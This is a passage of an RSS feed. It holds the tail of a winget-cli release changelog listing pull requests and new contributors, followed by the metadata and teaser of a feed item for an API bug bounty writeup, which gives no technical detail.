<li>Add thread globals for downloader thread by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4258013619" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6141" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6141/hovercard" href="https://github.com/microsoft/winget-cli/pull/6141">#6141</a></li>
<li>Dynamically select drive for test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4214412645" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6129" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6129/hovercard" href="https://github.com/microsoft/winget-cli/pull/6129">#6129</a></li>
<li>Change how Truncation works by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259464272" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6142" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6142/hovercard" href="https://github.com/microsoft/winget-cli/pull/6142">#6142</a></li>
<li>Admin setting and group policy for configuration processor path argument by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4182457379" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6119" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6119/hovercard" href="https://github.com/microsoft/winget-cli/pull/6119">#6119</a></li>
<li>Add comments to loc strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278175050" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6150" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6150/hovercard" href="https://github.com/microsoft/winget-cli/pull/6150">#6150</a></li>
<li>Move XML ref ahead by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4284162176" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6154" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6154/hovercard" href="https://github.com/microsoft/winget-cli/pull/6154">#6154</a></li>
<li>Add policy for notifying authors of Localization Restriction by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288823601" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6156" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6156/hovercard" href="https://github.com/microsoft/winget-cli/pull/6156">#6156</a></li>
<li>Dont log failures to get font title info by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298573384" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6163" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6163/hovercard" href="https://github.com/microsoft/winget-cli/pull/6163">#6163</a></li>
<li>[ListCommand] Fix --source filter not restricting list output to specified source by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Madhusudhan-MSFT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Madhusudhan-MSFT">@Madhusudhan-MSFT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4293334569" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6159" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6159/hovercard" href="https://github.com/microsoft/winget-cli/pull/6159">#6159</a></li>
<li>Improved manifest validations for MSI and Windows Feature names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311235441" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6170" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6170/hovercard" href="https://github.com/microsoft/winget-cli/pull/6170">#6170</a></li>
<li>Mitigate packaged preindexed source open lock convoy by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mamoreau-devolutions/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mamoreau-devolutions">@mamoreau-devolutions</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311593126" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6172" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6172/hovercard" href="https://github.com/microsoft/winget-cli/pull/6172">#6172</a></li>
<li>Optimize packaged temp ACL handling without weakening ACL repairs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mamoreau-devolutions/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mamoreau-devolutions">@mamoreau-devolutions</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311326921" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6171" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6171/hovercard" href="https://github.com/microsoft/winget-cli/pull/6171">#6171</a></li>
<li>Add telemetry event for index updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325910774" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6175" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6175/hovercard" href="https://github.com/microsoft/winget-cli/pull/6175">#6175</a></li>
<li>Make extension comparison case insensitive by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4336637167" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6182" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6182/hovercard" href="https://github.com/microsoft/winget-cli/pull/6182">#6182</a></li>
<li>[Settings, ListCommand] Add sort types, settings infrastructure, and CLI arguments for output ordering by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Madhusudhan-MSFT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Madhusudhan-MSFT">@Madhusudhan-MSFT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4326435705" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6177" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6177/hovercard" href="https://github.com/microsoft/winget-cli/pull/6177">#6177</a></li>
<li>Add setting for installer log file names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3512311782" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5802" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5802/hovercard" href="https://github.com/microsoft/winget-cli/pull/5802">#5802</a></li>
<li>Add JSON validation output and interop presentation model by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339735803" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6183" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6183/hovercard" href="https://github.com/microsoft/winget-cli/pull/6183">#6183</a></li>
<li>Add default installer precedence if not defined by user by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4196821929" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6123" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6123/hovercard" href="https://github.com/microsoft/winget-cli/pull/6123">#6123</a></li>
<li>Standardize PR template with emoji sections and issue types by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373900925" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6207" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6207/hovercard" href="https://github.com/microsoft/winget-cli/pull/6207">#6207</a></li>
<li>Add Copilot instructions for writing specifications by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373818771" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6205" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6205/hovercard" href="https://github.com/microsoft/winget-cli/pull/6205">#6205</a></li>
<li>Fix policy bot bugs and expand label coverage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4373291216" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6202" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6202/hovercard" href="https://github.com/microsoft/winget-cli/pull/6202">#6202</a></li>
<li>Report DSC execution diagnostics on a timer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368050336" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6196" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6196/hovercard" href="https://github.com/microsoft/winget-cli/pull/6196">#6196</a></li>
<li>Store provisioning mitigation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366604990" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6194" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6194/hovercard" href="https://github.com/microsoft/winget-cli/pull/6194">#6194</a></li>
<li>Add execution level to telemetry summary and logs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366651180" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6195" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6195/hovercard" href="https://github.com/microsoft/winget-cli/pull/6195">#6195</a></li>
<li>Implement sort logic for winget list output<br>
by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Madhusudhan-MSFT/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Madhusudhan-MSFT">@Madhusudhan-MSFT</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353698237" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6191" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6191/hovercard" href="https://github.com/microsoft/winget-cli/pull/6191">#6191</a></li>
<li>VS Code WinGet log viewer tool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4277517365" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6149" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6149/hovercard" href="https://github.com/microsoft/winget-cli/pull/6149">#6149</a></li>
<li>Bump fast-uri from 3.1.0 to 3.1.2 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4432639720" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6223" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6223/hovercard" href="https://github.com/microsoft/winget-cli/pull/6223">#6223</a></li>
<li>Update <code>configure export --all</code> for recent DSC changes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4431732649" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6222" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6222/hovercard" href="https://github.com/microsoft/winget-cli/pull/6222">#6222</a></li>
<li>Mitigate stack overflow issue by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4433123276" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6224" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6224/hovercard" href="https://github.com/microsoft/winget-cli/pull/6224">#6224</a></li>
<li>Reset default sources without dropping them by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347741443" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6187" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6187/hovercard" href="https://github.com/microsoft/winget-cli/pull/6187">#6187</a></li>
<li>Enable transitive pinning for central package management by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4441204221" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6225" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6225/hovercard" href="https://github.com/microsoft/winget-cli/pull/6225">#6225</a></li>
<li>Configuration processor auditing improvements by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366411444" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6193" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6193/hovercard" href="https://github.com/microsoft/winget-cli/pull/6193">#6193</a></li>
<li>Update rest source and wingetutil interop to include 1.28 manifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4482042640" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6234" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6234/hovercard" href="https://github.com/microsoft/winget-cli/pull/6234">#6234</a></li>
<li>Move pre-check errors to post-check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488618163" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6236" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6236/hovercard" href="https://github.com/microsoft/winget-cli/pull/6236">#6236</a></li>
<li>In-proc certificate pinning validation override by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4479464952" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6233" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6233/hovercard" href="https://github.com/microsoft/winget-cli/pull/6233">#6233</a></li>
<li>Change symlink verification to avoid redirection guard policy by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4490077852" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6239" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6239/hovercard" href="https://github.com/microsoft/winget-cli/pull/6239">#6239</a></li>
<li>Bump uuid and @azure/msal-node in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4497658174" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6241" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6241/hovercard" href="https://github.com/microsoft/winget-cli/pull/6241">#6241</a></li>
<li>Bump qs from 6.15.1 to 6.15.2 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4508521780" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6246" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6246/hovercard" href="https://github.com/microsoft/winget-cli/pull/6246">#6246</a></li>
<li>Ensure portable command alias does not escape directory by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4527365695" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6251" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6251/hovercard" href="https://github.com/microsoft/winget-cli/pull/6251">#6251</a></li>
<li>Make sfs-client a vcpkg port by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4499084547" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6243" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6243/hovercard" href="https://github.com/microsoft/winget-cli/pull/6243">#6243</a></li>
<li>Bump tmp from 0.2.5 to 0.2.7 in /tools/WinGetLogViewer by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4534892375" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6252" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6252/hovercard" href="https://github.com/microsoft/winget-cli/pull/6252">#6252</a></li>
<li>Honor DSCv3 package installMode for silent and interactive by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4525632854" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6249" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6249/hovercard" href="https://github.com/microsoft/winget-cli/pull/6249">#6249</a></li>
<li>Fix triage label getting removed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4537505971" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6254" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6254/hovercard" href="https://github.com/microsoft/winget-cli/pull/6254">#6254</a></li>
<li>lowercase ARM64 for vcpkg by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4542807796" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6256" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6256/hovercard" href="https://github.com/microsoft/winget-cli/pull/6256">#6256</a></li>
<li>Apply latest loc patch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565579611" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6262" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6262/hovercard" href="https://github.com/microsoft/winget-cli/pull/6262">#6262</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DandelionSprout/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DandelionSprout">@DandelionSprout</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3571577317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5845" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5845/hovercard" href="https://github.com/microsoft/winget-cli/pull/5845">#5845</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kissaki/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kissaki">@Kissaki</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3543261404" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5824" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5824/hovercard" href="https://github.com/microsoft/winget-cli/pull/5824">#5824</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wmmc88/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wmmc88">@wmmc88</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3997110317" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6071" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6071/hovercard" href="https://github.com/microsoft/winget-cli/pull/6071">#6071</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GrantMeStrength/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GrantMeStrength">@GrantMeStrength</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4145157508" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6110" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6110/hovercard" href="https://github.com/microsoft/winget-cli/pull/6110">#6110</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AMDphreak/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AMDphreak">@AMDphreak</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111928053" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6096" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6096/hovercard" href="https://github.com/microsoft/winget-cli/pull/6096">#6096</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mamoreau-devolutions/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mamoreau-devolutions">@mamoreau-devolutions</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311593126" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/6172" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/6172/hovercard" href="https://github.com/microsoft/winget-cli/pull/6172">#6172</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/microsoft/winget-cli/compare/v1.28.240...v1.29.250"><tt>v1.28.240...v1.29.250</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mastery Hunt: Hidden API Endpoints — A Deep Dive into API Bug Bounty Recon & Exploitation]]></title>
<description><![CDATA[API security testing is the crown jewel of modern bug bounty hunting. While front-end vulnerabilities still exist, APIs are where the real treasure lies — sensitive data, privileged operations, and business logic flaws. This writeup covers the complete lifecycle of discovering, analyzing, and exp...]]></description>
<link>https://tsecurity.de/de/3600902/hacking/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600902/hacking/mastery-hunt-hidden-api-endpoints-a-deep-dive-into-api-bug-bounty-recon-exploitation/</guid>
<pubDate>Tue, 16 Jun 2026 09:09:18 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
